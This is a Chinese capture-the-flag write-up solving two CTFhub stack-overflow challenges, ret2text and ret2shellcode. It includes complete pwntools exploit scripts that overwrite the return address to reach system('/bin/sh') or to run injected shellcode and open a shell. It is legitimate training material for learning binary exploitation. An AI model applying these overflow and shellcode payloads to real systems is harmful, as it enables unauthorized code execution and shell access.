CTFhub pwn

1.ret2text
2.ret2shellcode

@TOC

1.ret2text

file checksec

ida64
gets函数有栈溢出漏洞，题目为ret2text即返回到text段得到shell

shift+f12打开字符串窗口，找到/bin/sh

点进去，选中/bin/sh，右键，交叉引用列表（可以找到使用/bin/sh的地方）

看到把/bin/sh放入rdi后，调用了system
x64，64位系统中rdi，rsi，rdx，rcx，r8，r9作为调用函数的前6个参数，如果参数多于6个，其余参数放入栈中
与此对比，x86，32位系统中由于寄存器有限，调用函数时参数都放入栈中，两系统间的区别对于之后的retlibc等题型构造payload时有差异，需要注意

那么只要把栈中填满，放入此处的地址就可以得到shell了
脚本

#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
content=0
def main():
    if content==0:
        io=process("./ret2text")
    else:
        io=remote("challenge-b2e447d1cb66895b.sandbox.ctfhub.com", 27897)

    shell_addr=0x04007B8
    payload=b'a'*(0x70+8)+p64(shell_addr)
    io.recvuntil("Welcome to CTFHub ret2text.Input someting:")
    io.sendline(payload)
    io.interactive()

main()

2.ret2shellcode

file checksec

ida64
由于NX保护没有开，所以栈的数据段可以执行
read函数有栈溢出漏洞，但没有system函数和/bin/sh，
printf将buf即栈的地址泄露了出来，那么我们就可以在栈上写入shellcode，并在溢出后ip返回到栈的数据上，那么就可以得到权限了

查看栈的长度，发现只有0x10，比构造的shellcode短，如果直接填入shellcode，那么就无法控制返回的地址了，所以先填入垃圾数据，在ret处填入返回地址（即shellcode将要填在栈中的地址），最后填入shellcode

脚本

#!/usr/bin/env python3
from pwn import *
context(os="linux",arch="amd64",log_level="debug")
content=0
def main():
    if content==0:
        io=process('./pwn4')
    else:
        io=remote('challenge-de788ec2079f9dc9.sandbox.ctfhub.com',26943)

    #shellcode
    shellcode=asm(shellcraft.sh())
    print(shellcode)

    #leak_buf_addr
    io.recvuntil('[')
    buf_addr=io.recvuntil("?\n")[:14]
    print(buf_addr) 
    #可以先将接收到的字符串打印出来，再确定地址长度以及如何切片
    
    #shellcode_addr
    shellcode_addr=int(buf_addr,16)+0x18+8
    print(p64(shellcode_addr))
    #后面+0x18+8是因为栈中先填充了（0x18+8）个'a'以及p64(buf_addr)

    #payload
    payload = b'a' * (0x10 + 8) +p64(shellcode_addr)+shellcode
    #getshell
    io.recvuntil("Input someting : \n")
    io.sendline(payload)
    io.interactive()

main()

python中int()函数的用法

-------------本文结束感谢您的阅读-------------

赏

谢谢你请我吃糖果